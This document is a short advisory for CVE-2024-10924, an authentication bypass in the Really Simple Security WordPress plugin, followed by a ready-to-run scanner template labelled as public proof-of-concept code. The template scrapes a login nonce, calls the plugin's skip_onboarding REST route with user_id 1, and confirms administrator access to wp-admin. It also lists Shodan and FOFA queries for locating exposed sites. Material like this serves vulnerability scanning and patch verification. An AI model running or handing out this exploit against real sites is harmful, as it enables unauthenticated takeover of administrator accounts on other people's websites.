The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
PoC代码[已公开]
id: CVE-2024-10924
info:
name: Really Simple Security < 9.1.2 - Authentication Bypass
author: yaser_s
severity: critical
description: |
The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
remediation: Fixed in 9.1.2
reference:
- https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L277
- https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L278
- https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L67
- https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
- https://wpscan.com/vulnerability/8e1f4374-2e41-4c27-80d4-db172015c6be/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5d05ad-1a7a-43d2-bbbf-597e975446be?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-10924
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-10924
cwe-id: CWE-288,CWE-306
epss-score: 0.9395
epss-percentile: 0.99877
cpe: cpe:2.3:a:really-simple-plugins:really_simple_security:*:*:*:*:-:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: really-simple-plugins
product: really_simple_security
framework: wordpress
shodan-query: html:"/wp-content/plugins/really-simple-ssl"
fofa-query: body="/wp-content/plugins/really-simple-ssl"
tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl,vkev
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: nonce
part: body_1
group: 1
regex:
- '"nonce":"([a-z0-9]+)"\}'
internal: true
- raw:
- |
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"user_id": 1,
"login_nonce": "{{nonce}}",
"redirect_to": "/wp-admin/"
}
matchers:
- type: word
part: body
words:
- '"redirect_to":"\/wp-admin\/"'
internal: true
- raw:
- |
GET /wp-admin/profile.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Personal Options'
- type: word
part: content_type
words:
- 'text/html'
# digest: 4b0a00483046022100aa48dc31b68d5fa540953256b41aef6f9d77d3abb5ff0fcc108ed95abaaa0d77022100df97c4b975a67f1ba59aa9c329d1ccde8ef313e9cd7f15d84851fb484e797c77:922c64590222798bb761d5b6d8e72950